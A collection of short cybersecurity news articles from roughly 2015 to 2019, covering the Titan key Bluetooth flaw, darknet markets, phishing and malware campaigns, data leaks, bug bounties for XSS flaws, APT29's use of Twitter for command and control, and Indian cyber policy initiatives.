Security Bug Discovered in Google's Titan Security keys, Provides Free Replacement




A security bug in Google’s Titan Security Key which can potentially allow fraudsters located nearby to bypass the security provided by the key. While the company provided a replacement key for free to all the already existing users, it blamed a “misconfiguration in the Titan Security Keys’ Bluetooth pairing protocols” for the security bug.
Although the defected keys are reported to be still protecting against phishing attacks, the company decided to provide a replacement key regardless. The affected keys include all those which are sold in packages priced a $50; it also includes a usual NFC/USB key.
In order to exploit the security bug, the fraudsters need to in a Bluetooth range of around 30 feet, he is supposed to act promptly as the victim activates the key by pressing the button, then the fraudsters can employ falsely configured protocol to intercept your device’s connection to the key and connect theirs instead. Then given, they would be having access to your username and password, they would be able to log in to the victim’s account.
Google has given students to ensure that the bug does not intercept the security key’s ultimate purpose that is to provide security against phishing attacks; Google also urged the users worldwide to keep utilizing the keys until a replacement is provided.
In an announcement, the company said, “It is much safer to use the affected key instead of no key at all. Security keys are the strongest protection against phishing currently available,”
Around the time when Google launched its Titan keys, Stina Ehrensvärd, Yubico founder, wrote, “While Yubico previously initiated the development of a BLE security key, and contributed to the BLE U2F standards work, we decided not to launch the product as it does not meet our standards for security, usability and durability,”




Darknet: The digital underground



The arrest of two Delhi youths for the import and sale of illegal marijuana through the darknet in December last year sparked widespread discussion on the rising prominence of the darknet in India. With dark net being the new market for drug peddlers and illegal traders, it is slowly becoming one of the most challenging problems to be tackled in this cyber age.

What is the darknet?

The world wide web can be divided into three categories- the surface web, the deep web and the dark web. While pages on the surface web(visible web ) are indexed and can be easily accessed by the public, pages on the deep web are not indexed and hence cannot be readily accessed. The content of the deep web is hidden behind HTTP forms and includes many common uses such as webmail, online banking, and services that users must pay for, and which is protected by a paywall, such as a video on demand, some online magazines and newspapers, and many more. Content of the deep web can be located and accessed by a direct URL or IP address and may require a password or other security access past the public website page. The dark web is that part of the internet which can be accessed only by ‘overlay networks ‘ and needs special browsers like TOR to access. Browsers like TOR ensure anonymity to the host as well as the user, by protecting the IP address with its ‘overlay network’ structure.

Illicit drugs, weapons and online fraud : the endless dangers of darknet

The promise of anonymity the darknet offers has led to an alarming increase in its use in the last 4 years. A 2015 study showed that drugs are the most traded commodity on the dark web and 26 per cent of its content can be classified as ‘child exploitation’. A December 2014 study by Gareth Owen from the University of Portsmouth found that the most commonly hosted type of content on Tor was child pornography, followed by black markets. Stolen credit card details, forged documents, counterfeit currency and weapons are the other types of content. Reports of crowdfunded assassinations, hitmen and live streamed murders are believed to be available on the darknet.

How does it work?

Cryptocurrencies such as bitcoin are used for transactions on the darknet. Purchases on the darknet come with reviews and ratings just like on Amazon and Flipkart and are delivered to the customer’s doorstep just like any other order. Service providers like ‘escrow’ ensure that the transaction is made to the seller only after the customer receives the package. Often disguised, these illegal products mostly make their way through customs to the customers' doorstep.

Cracking the whip :

Though highly evasive, browsers like Tor aren’t completely untraceable. In early November, a coordinated action by the FBI and Europol known as Operation Onymous seized dozens of Tor hidden services, including three of the six most popular drug markets on the Dark Web. For now, just how the feds located those sites remains a mystery.

“ The Interpol, Europol and the FBI are the ones striving hard to keep the darknet dangers in check”, says J.Prasanna, Director of Cyber Security and Privacy Foundation, Singapore.

” The first step towards net safety comes down to parental supervision”, says J .Prasanna who provides dark web monitoring for banks.

“ The Indian government should ensure stringent punishment for the offenders using darknet for illegal trade and activities. The police department too should be technologically advanced to handle such crimes”, says V.Rajendran, Chairman, Digital Security Association of India.


The bright side :

It would be safe to say not everything is dark about the darknet. The privacy it provides is a major attraction to many who are looking to escape the watchful eyes of service providers and federal agencies. Anonymous messenger services and access to tonnes of resources (data, books, documents) argues the use of darknet for good.

Author:
Yamuna Chandran

Most of the Antivirus Android Apps Ineffective and Unreliable



In a report published by AV-Comparatives, an Austrian antivirus testing company, it has been found out that the majority of anti-malware and antivirus applications for Android are untrustworthy and ineffective.

While surveying 250 antivirus applications for Android, the company discovered that only 80 of them detected more than 30% of the 2,000 harmful apps they were tested with. Moreover, a lof of them showed considerably high false alarm rates.

The detailed version of the report showcased that the officials at AV-Comparatives selected 138 companies which are providing anti-malware applications on Google Play. The list included some of the most well-known names like Google Play Protect, Falcon Security Lab, McAfee, Avast, AVG, Symantec, BitDefender, VSAR, DU Master, ESET and various others.

ZDNet noted that the security researchers at AV-Comparatives resorted to manual testing of all the 250 apps chosen for the study instead of employing an emulator. The process of downloading and installing these infectious apps on an Android device was repeated 2,000 times which assisted the researchers in concluding the end result i.e., the majority of those applications are not reliable and effective to detect malware or virus.

However, the study conducted by AV-Comparatives also highlighted that some of the offered antivirus applications can potentially block malicious apps.

As some of the vendors did not bother to add their own package names into the white list, the associated antivirus apps detected themselves as infectious. Meanwhile, some of the antivirus applications were found with wildcards in order to allow packages starting with an extension like "com.adobe" which can easily be exploited by the hackers to breach security.

On a safer side, Google guards by its Play Protect which provides security from viruses on Android by default. Despite that, some users opt for anti-malware apps from third-party app stores or other unknown sources which affect safety on their devices.

The presence of malicious apps on Google Play was also noticed in the past and with the aforementioned study, Android is becoming an unsafe mobile platform.




QR-codes on historical buildings of Russian city Astrakhan that led to Adult sites have been removed


Hacker reportedly changed website location of the QR-codes on historical buildings of Russian city Astrakhan and replaced them with adult website link. There was no technical detail provided how hacker was able to change the location of QR code.

When residents and guests of the city scanned QR-codes, their phones opened resources for adults, instead of sites with historical references.

Galina Goteeva, the Minister of Culture and Tourism of the region, said on March 15 that the signs with QR codes on the historical buildings of Astrakhan were changed.

QR-codes on historically significant buildings of Astrakhan were placed a few years ago. It was assumed that people can get a historical reference about the building after scanning the code with a mobile phone. Already in November last year, the Media reported about QR codes leading to porn sites and dating sites for quick sex.

In fact, the Regional Ministry of Culture for a long time struggled with the elimination of porn content, the signs were removed with great difficulty. And only at the end of the year sex traffic was stopped completely.

However, it is still a mystery why the signs with QR-codes hung for so long and why they were not promptly replaced. In total, there are at least 15 signs. QR-codes stopped working more than a year ago, but officials did not pay any attention to it: first, the pages gave an error, and later they began to lead to porn sites.

Hackers Delivering New Muncy Malware Worldwide through DHL Phishing Campaign



With malicious intentions of targeting the users across the globe, attackers are reported to be disseminating new dubbed Muncy malware in the form of EXE file through DHL phishing campaigns.

Resorting to malspam emails, DHL phishing is amongst the most far-reaching campaigns which distributed several sophisticated malware. They made it appear legitimate by exploiting the deplorable configuration of SMTP servers and by employing email spoofing techniques.

DHL is a company of global repute which specializes in providing express mail services, international couriers and parcels. The reputation of the well-established company took some hits by the cybercriminals as they abused it to distribute malware. 

They did so by configuring the malicious emails to appear to be coming from DHL express. The email comprised of an infected attachment in PDF format.

How the malware is executed?

As soon as the targeted user accesses the PDF attachment, Muncy Trojan file sneaks into the system. Then the packed malware is unpacked and once unpacked it scans the whole C:\ drive for the files containing sensitive data. 

Expert takes

Commenting on the matter, Pedro Tavares, Founder, and Pentester at CSIRT.UBI told the GBHackers, “The phishing campaign is trying to impersonate DHL shipment notification and the malware is attached in the email.”

“This malware is on the rise and is affecting user’s in-the-wild while stealing sensitive information from their devices.”





Scammers disguise themselves as divisions of the Central Bank of Russia


Cyber Criminals performed a large-scale attack on Russian banks in late 2018, they managed to steal $ 20 million.

The attackers disguised themselves as divisions of the Central Bank FinCERT and Alfacapital. It is known that the attacks were carried out by hacker groups Silence and Cobalt, who had previously organized cybercrime. Also along with them operated a new hacker group, which had not been seen before.

The scheme of crimes was the same: the scammers on behalf of the FinCERT division of the Central Bank sent out malicious documents with macros. In addition, a compromised account of an employee of the company Alfacapital was used.

Representatives of many banks confirm the frequent attacks. The criminals tried to penetrate the infrastructure of the financial organization for the withdrawal of money.

The IT-company Positive Technologies conducted their own statistics and found that over 201 million people suffered from such attacks in 2018.

Moreover, banking infrastructure was attacked in 78% of cases, web resources - 13 %, ATMs and POS-terminals - 9 %, personal data - 39% , credential theft , card information, trade secret - 5%, personal correspondence and other information - 8%.

In addition, on February 18, Kaspersky Lab recorded an increase in attacks by Buhtrap and RTM banking Trojans in Russia. At the end of last year, experts recorded an increase in the activity of the banking Trojan RTM 50 times, compared to 2017.

Over 200 Million Chinese CVs Compromised On The Dark Web


Over 200 Million Chinese CVs Compromised Online







Recently, a database comprising of over 200 million Chinese CVs was discovered online in a compromised position where it was laid bare for the dark web to devour. Naturally, it spilled explicitly detailed information.



Having lacked, fundamentally basic security endeavors, the database exposed some really personal data of people.



The database encompassed their names, addresses, mobile phone numbers, email addresses, education details and other what-not.



The much detailed information on the base was developed by persistently scouring various Chinese job sites.



Reportedly, the director of the researching institution cited on the issue that at the outset, the data was thought to be gained from a huge classified advert site, namely, BJ.58.com.



Nevertheless, BJ.58.com, vehemently denied the citation and their relation with this accident.



They had thoroughly analysed and checked their databases and found nothing questionable, hence reassuring that they had no role to play in the data leakage.



They also mentioned that certainly some third-party CV website “Scraper” is to blame.



It was via twitter that the news about this data cache first floated among people, and soon after that, it was removed from Amazon cloud where it had been stored.



But, as it turned out while further analyzing, before it was deleted it had previously been copied around 12 times.



There has been a series of incidents where the Chinese have been cyber-affected, and this data loss is the latest of all.



From online rail bookings to allegedly stealing rail travelers personal data, the early days of January were quite bad for the Beijing people.



Reportedly, in August last year, the police of China were busy investigating a data breach of hotel records of over 500 million customers.



Personal data, including the booking details and accounts, registration details and other similar information were leaked.



Also, the Internet Society of China had released a report wherein the several phishing attacks and data breaches the country’s residents had faced were mentioned.


UK spymasters suspect Russia is using Kaspersky to spy on people

 

British Intelligence service is reportedly worried that Kaspersky Antivirus offered by Barclays to its customers may be being used by Russian Intelligence agency to spy, according to The Financial Times.

An unnamed official told The Financial Times that GCHQ, British intelligence agency has concerns over widespread distribution of Kaspersky in the UK.

Intelligence officials fear that this might allow Russia to gather intelligence from the computers of Government employees members of the military who are customers of the Bank and have downloaded the software.

The Financial Times added that "No evidence suggests that any data of Barclays customers have been compromised by use of Kaspersky software on their computers."

However, the bank said they were planning to end the deal with Kaspersky for commercial reasons that doesn't have any connection with the GCHQ concerns.

Kaspersky denied the allegations and said the company does not have inappropriate ties with any government.

"No credible evidence has been presented publicly by anyone or any organization. The accusations of any inappropriate ties with the Russian government are based on false allegations and inaccurate assumptions, including the claims about Russian regulations and policies impacting the company." Kaspersky said.

Earlier this year, US Spymasters and FBI chief said that they do not trust software from Russian antivirus company Kaspersky.

- Christina
 

Russian hackers stole 60.5 million rubles using malware

According to the Ministry of International Affairs of Russian Federation, two natives of the Sverdlovsk region stole more than 60.5 million rubles from Petropavlovsk-Kamchatsky (center of Kamchatka Krai) Bank and another commercial organizations.

Irina Volk, official representative of the MIA, said that hackers were able to access the computers of the affected organizations using Malware.  Stolen money was transferred to the Bank accounts of front organizations and cashed.

Criminal cases of illegal access to computer information and cybercrime will be heard soon. According to the first case, hackers can face up to five years imprisonment. According to second, they can face up to ten years with a fine up to one million rubles.

It is known that they have another partners. The investigation against hacker group continues.

According to Ilya Sachkov (CEO and founder of Group-IB), 100% effective safeguards against cyber attacks does not exist, but every organization can reduce the risks and improve protection of banks. The most important thing for organizations is creation their own Information Systems and Security Division.

- Christina


Putin Says Number of Cyber attacks against the Russia grew three times

The number of attacks launched against Russian Cyberspace has increased significantly in the recent years, President of Russian Federation Vladimir Putin said at the annual board meeting of the Federal Security Services on February 16.
 
"The Number of cyber attacks against official information databases has tripled in the past year compared to 2015", — said the President.

On 11 February, Oleg Salagai, the Director of the Department of public health & communications Ministry, said that unknown hackers attacked the official website of the Health Ministry. The attackers failed to gain access to any personal data or classified files.


Making Indian Cyberspace Secure!


At a time when Cyber attacks are increasing with every passing day, the Indian government on Tuesday (February 21) launched a Cyber Swachhta Kendra (Botnet Cleaning and Malware Analysis Centre) which is a desktop and mobile security solution for maintaining a secure Cyber space in the country.

India’s IT and Electronics Minister, Ravi Shankar Prasad through its Computer Emergency Response Team (CERT-in) launched the M-Kavach tool in New Delhi which offers a comprehensive mobile device security solution for Android devices addressing threats related to mobile phones. The new solution will notify, enable cleaning and secure systems of end-users to prevent further infections.

"Launched 'Cyber Swachhta Kendra' (Botnet Cleaning and Malware Analysis Centre), an imp milestone in various initiatives taken on Cyber Security," tweeted Prasad. Botnets fundamentally is a program which is automated and runs on a computing device which can be any IoT/smart device. The attacks taking place using botnets are called Distributed Denial of Service (DDoS).

* Botnet Cleaning and Malware Analysis Centre (Cyber Swachhta Kendra) -

India has been ranked 3rd in bot-net distribution. Its a good move for Indian government to clean the computers.  CERTIn has chosen an Indian product for this.

Research by CSPF(Non profit organization) found that Malwarebytes / Avast anti-virus free anti-virus are more effective in removing viruses/bots.

The free product chosen by CERTIn also advertises that botnet cleaning tool is not replacement to anti-virus. "The vendor is trying to sell his other anti virus solutions which is totally unacceptable" according to an US based anti virus company.

"Antivirus and botnet cleaners should be constantly maintained,  Who is going to do this CERTIn or Indian vendor?" asks the US based anti-virus company.

According to CSPF "some samples of botnet were missed by this tool", the tool should have a facility to report malware missed by this tool.

"Launched USB Pratirodh, which will control the unauthorized usage of removable USB storage media devices like pen drives, external hard drives. Launched App Samvid, to protect Desktops from suspicious applications from running," the minister added.

USB Pratirodh is a desktop security solution that controls the usage of removable storage media like pen drives, external hard drives and other USB-supported mass storage devices.

AppSamvid is a desktop solution which protects systems by allowing installation of genuine applications through white listing. This helps in preventing threats from malicious applications.

According to Cyber Security & Privacy Foundation "Some of these tools developed by CDAC including white listing tool is far more complex for a normal user to understand.  White listing tool does not detect .msi files and other extension". 
Executable blocking / allowing has to be manually done. Most end users don't understand white listing, they don't know which to allow/block when there is an issue. users should not end up locking their own computers. Auto white listing that is available in some famous anti viruses should be included.
 
The reason cyber security is an issue among common man is because common man does not understand anything technical. If using the tool is more complex then the actual problem how are we going to solve the problem says a college student.

He also suggests "video should be released by CDAC showing what the tool is about and how to install and run" in multiple languages. 

During the launch, Prasad said that the 13 banks and Internet service providers are using this government facility presently and the government will co-ordinate with other ISPs and product/antivirus companies to spread its usage for a safer online space.

Prasad said that this Kendra will also enhance awareness among citizens regarding botnet and malware infection along with measures to be taken to secure their devices.

The minister also announced that the National Cyber Coordination Centre will be operational by June 2017 and CERT-Ins will be set up at state level as well.

"The government will set up 10 more STQC (Standardization Testing and Quality Certification) testing Facilities. Testing fee for any start-up that comes up with a digital technology in the quest of cyber security will be reduced by 50 per cent. We will also empower designated forensic labs to work as the certified authority to establish cyber crime," Prasad noted.

The move comes at a time when over 50,300 cyber-security incidents like phishing, website intrusions and defacements, virus and DDoS attacks have been observed in the country during 2016.

As per the information reported to and tracked by CERT-In, a total number of 44,679, 49,455 and 50,362 cyber-security incidents were observed during the years 2014, 2015 and 2016, respectively.

The Cyber Swachhta Kendra is part of the government of India’s Digital India initiative under the Ministry of Electronics and Information Technology (MeitY). The Cyber Swachhta Kendra complies with the objectives of the National Cyber Security Policy which aims at creating a secure cyber Eco-system in the country.

The botnet and malware cleaning analysis centre was announced in 2015 with an outlay of Rs. 100 crores.

Industry experts wonder about the 100 crore outlay if it is going to used for building antivirus/botnet cleaning software, honeypots to track bots and take down botnets.

The threat of Cyber security has become more serious and visible in the past few years in the country. There is a need to collaborate and come forth with more solutions like the Cyber Swachhta Kendra. It was a much-needed move by the government. It should not be just another public relation exercise but it should be effective.

You can download the tools from here:
http://www.cyberswachhtakendra.gov.in/security-tools.html


Cyber Insurer sued after company loses $480K in CEO Fraud

A Texas-based engineering firm, Ameriforge Group Inc. or popularly known as AFGlobal is suing its cyber insurance provider, Federal Insurance Co., a division of insurance giant Chubb Group for refusing to cover a $ 480,000 loss following an email scam that impersonated the firm’s chief executive.

AFGlobal claims of having the papers to prove that scammers impersonating AFGlobal’s CEO convinced the company’s accountant to wire $ 480,000 to Agricultural Bank of China.


According to documents filed with the U.S. District Court in Harris County, Texas, the policy covered up to $3 million, with a $100,000 deductible. The documents indicate that from May 21, 2014 to May 27, 2014, AFGlobal’s director of accounting received a series of emails from someone claiming to be Gean Stalcup, the CEO of AFGlobal.

After the demand was fulfilled, the email sender then asked for an additional $ 18 million.

The firm expects some payout from its insurer for this incident but the insurer expects all this to go away.

CEO Fraud schemes are an increasingly common and costly form of cybercrime. According to the FBI, thieves have stolen nearly $750 million in such scams from more than 7,000 victim companies in the U.S. between October 2013 and August 2015.

The chief financial officer of one of New Zealand’s largest learning institutions had left her job after falling for an email “whaling” scam.

The executive director of finance at Te Wananga o Aotearoa, Bronwyn Koroheke, transferred $US 79,000 ($118,000) to an offshore bank account after receiving an email which appeared to be from her chief executive Jim Mather telling her to send the money which was actually sent from Chinese-based fraudsters running a whaling scam.

In such a scenario, the FBI has urged businesses to adopt two-step or two-factor authentication for email, where available, and/or to establish other communication channels such as telephone calls to verify significant transactions. Businesses are also advised to exercise restraint when publishing information about employee activities on their Web sites or through social media.

Source: KrebsOnSecurity

Mozilla awarded $2,500 to security researcher

Security Researcher Ashar Javed, recently discovered three bugs with Mozilla add-ons portal and that had been exploited via "Create new collection" feature.

It was discovered that malicious codes could be inserted in collection of  Mozilla Add - ons . These ad - ons are basically used to organize add-ons for business and personal purposes and can be shared on social media as well.

“Given that the Mozilla add-on site has millions of downloads, it is easily possible for the attacker to convince the victim to visit the collection page,” the expert told SecurityWeek.

Users were later exposed with all kinds of virus attack that could be carried via XSS flaws  and most common attack was cookie theft.

Websites are generally vulnerable to  XSS flaw, add-on collections are very useful for Firefox users, so for discovering the issue Mr Javed recieved $2,500 from Mozilla. There were two other bugs discovered about which Mozilla did not reveled any information apart from the location.

This is not the first time that he had received the heavy amount, Google awarded him $3,000 for a reflected XSS in the main search bar of the YouTube Gaming website.

Smart devices at risk with three-year-old vulnerability

A total of 6.1 million smart TVs, routers and phones are at risk due to a three-year-old vulnerability which has not been patched by many vendors.

The problem came due to a loophole in the portable SDK for UPnP™ Devices or libupnp that allows a buffer overrun to run arbitrary code on an affected device that can give the attacker ability to take control of the device.

Devices that do not have defenses such as data execution prevention and address space layout randomization are ast risk because of this.

This library is used to implement media playback (DLNA) or NAT traversal (UPnP IGD). Apps on a smartphone can use thtese features to play media files or connect to other devices within a user’s home network.

This is the reason why researchers think China's behind the attack on Australia's BoM and why Chinese criminals target journalists.

Although a patch was issued for the component in December 2012, a global security software company, Trend Micro found 547 apps used an older unpatched version of it. 326 out of them are available on Google Play store, including high-profile apps such as Netflix and Tencent QQMusic.

The vulnerability is also found widely in 3G and 4G cellular USB modems and routers.

The campaign first installs "Pony," then a "cocktail" of malware that harvests credentials before encrypting files.

The concern is growing to look over how manufacturers of devices such as routers and smart TVs deal with security vulnerabilities that emerge in their products.


Android and iOS developers need to be keep an eye out for security fixes when including 3rd party libraries that use c/c++ and updating apps accordingly.

World Bank site hacked to launch PayPal phishing page

A report published in SecurityWeek confirmed that the official website of a World Bank’s Climate Smart Planning Platform (CSPP) project had been hacked by two hackers which, was later used to host a well-designed PayPal phishing page.

According to the news report, the CSPP project, which focuses on helping developing countries create and implement climate-smart policies, was ideal for phishing attacks as it used an Extended Validation (EV) SSL certificate issued by Comodo for the World Bank Group.

Since the website carried EV and SSL certificate issued for the World Bank Group, it gave the phishing website enough credibility for the visitors to easily fall for it.

It is said that the certificate gives the “highest available level of trust” as it is offered after an extensive verification process.

After that it displays the name of the owner.

Now, the PayPal phishing site tricked the visitor into logging in with their PayPal credentials. Soon after, the data was submitted and stolen, the user was prompted that the site was unable to load the user’s account and required confirmation of their personal information.

The site then required the user to share their email address, name, postal address, date of birth, and phone number.

Then, it asked the user to verify their PayPal payment information, including credit card number, expiry date, its CVV number, and 3D Secure password if the card required verification. After collecting this personal and payment information, the phishing site then directed the user to the legitimate PayPal website.

The phishing page was hosted on climatesmartplanning.org, the fact that the green address bar in the browser displayed “World Bank Group” might have convinced users that the page was legitimate.

According to various news reports, the same CSPP website was also targeted by a different type of hacker. Although, the phishing page was removed by the CSPP webmasters, the site’s homepage was defaced by an Iraqi hacker who appears to deface random websites in an effort to boost his reputation among his peers.

Today, the site’s EV certificate has been revoked.



Teenager who hacked US and British government website faces jail

A British teenage hacker has been warned by the Birmingham Crown Court that he faces possible jail time for bringing down the FBI's and the Home Office's website.

Charlton Floate  (19) has pleaded guilty to three counts under the Computer Misuse Act and three charges for possessing prohibited images.

Charlton's lawyers argued that their client was only on the outside of the whole conspiracy and not deeply involved in the matter but the court has ruled out that possibility saying that Charlton is a very intelligent man who is an expert in computer marketing.

The judge quoted in the hearing, "A successful attack on the FBI.gov website is regarded by hackers as the Holy Grail of hacking. It was this which he attempted and, indeed, achieved.He was the person who instituted such attacks and assembled the tools and personnel for doing so."

The FBI site was down for about five hours where as the Home Office site crashed for 83  minutes.

PayPal fixes serious vulnerability in its domain

Photo Courtesy: Security Down

A serious flaw in PayPal Holdings Inc, an American company which operates a worldwide online payments system, has been patched. The flaw could have allowed an attacker to trick users into handing over their personal and financial details.

The flaw, which was detected by Ebrahim Hegazy, was caused by a stored cross-site scripting (XSS) bug in the SecurePayments.PayPal.com domain, which is used for PayPal’s hosted solution that enables buyers to pay with a payment card or their PayPal account, eliminating the need to capture or store sensitive payment information

“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fullfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfere the users fund to his own account,” the researcher posted in his blog.

According to the Egypt-based researcher, a malicious actor could have set up a rogue shopping site or hijacked a legitimate website, and alter the “Checkout” button with a URL designed to exploit the XSS vulnerability.

The flaw could allow the attacker to change the contents of the SecurePayments page and display a phishing page where the victim is instructed to enter personal and financial information. The collected data is then sent back to a server controlled by the attacker, the researcher explained.

The researcher, who had found a serious flaw in Yahoo domain last year, reported about the vulnerability to PayPal on June 19. The payment processor confirmed patching the flaw on August 25.


After that, the company concerned awarded Hegazy $750 for his findings, which is said to be the maximum bug bounty payout for XSS vulnerabilities. 

FBI catches teen accused of Swatting

A teenager from Texas has pleaded guilty to swatting and giving bomb threats to a Minnesota high school after being caught by the FBI.

The 19 year old Zachary Lee Morgenstern is accused of pulling off various swatting incidents in the Marshall, Minnesota area from Octover 2014 to May 2015.

Zachary is also accused of threatening a police officer and his family.

The FBI got hold of Zachary by sending a subpoena to Google to get details of one of Zachary's email accounts.

The FBI zeroed in on Zachary by using a twitter handle and a Google email id.

Russian APT attackers control the Hacked Machines using Twitter, Github




Russian APT attackers have used an advanced type of backdoor which tries to avoid detection by adding layers of obfuscation and mimicking the behavior of legitimate users. 

The attackers used popular legitimate websites such as Twitter, Github and other compromised web servers to send instructions and steal data from the compromised machines, according to a APT report published by the security firm FireEye.


The group is known as APT29, which creates an algorithm that generates daily Twitter handles and embedding pictures with commands. 

The attackers post instructions for their backdoors in a tweet, which contains a URL and a hashtag.  The malware will download contents hosted in the specific URL including all images in the page. 

They hide the data and other instructions within an Image file using a technology called Steganography. 

The Hashtag contains a number representing a location within the image file and a few characters that should be appended to the decryption key.  The key will be used for retrieving the data stored in the  image.


The instructions also contains where to upload the stolen data - It uploads to a specific account on a cloud storage service using the login credentials.

APT 29 is suspected to be in Russia since it is active during normal working hours in Moscow.

SEBI comes up with cyber security policy for stock exchanges, depositories and clearing corporations

Securities and Exchange Board of India (SEBI), which established in 1988 to regulate the securities market in India, asked stock exchanges, depositories and clearing corporations to put in place a system that would prevent systems, networks and databases from cyber attacks and improve its resilience.

According to a report published on LiveMint, the SEBI said these Market Infrastructure Institutions (MIIs) need to have a robust cyber security framework to provide essential facilities and perform systemically critical functions of trading, clearing and settlement in securities market.

“As part of the operational risk management framework to manage risk to systems, networks and databases from cyber attacks and threats, the MII should formulate a comprehensive cyber security and cyber resilience policy document to put in place such a framework,” the SEBI said.

It is said that the SEBI also asked the MII to restrict access controls in the time of necessary.
As per which no one will have any intrinsic right to access confidential data, applications, system resources or facilities.

The SEBI has asked it to deploy additional controls and security measures to supervise staff with elevated system access entitlements.

According to the news report, the SEBI Chairman UK Sinha said that attackers are attacking in a more sophisticated manner.  

“We are worried over state-sponsored cyber attacks. There are worries that the vulnerability in markets are increasing. We need to create a framework for future plan of action on securities market resilience,” he added.

The exchanges and other the MIIs would also have to submit quarterly reports to the SEBI, containing information on cyber attacks and threats experienced by them and measures taken to mitigate vulnerabilities, threats and attacks including information on bugs, vulnerabilities and threats that may be useful for other the MIIs.

Along with this, the MIIs have to share the useful details among themselves in masked and anonymous manner using a mechanism to be specified by the regulator from time to time, to identify critical assets based on their sensitivity and criticality for business operations, services and data management.

Likewise, it should maintain up-to-date inventory of its hardware and systems, software and information assets (internal and external), details of its network resources, connections to its network and data flows.

The SEBI asked market stakeholders to establish baseline standards to facilitate consistent application of security configurations to operating systems, databases, network devices and enterprise mobile devices within the IT environment and also to restrict physical access to the critical systems to minimum.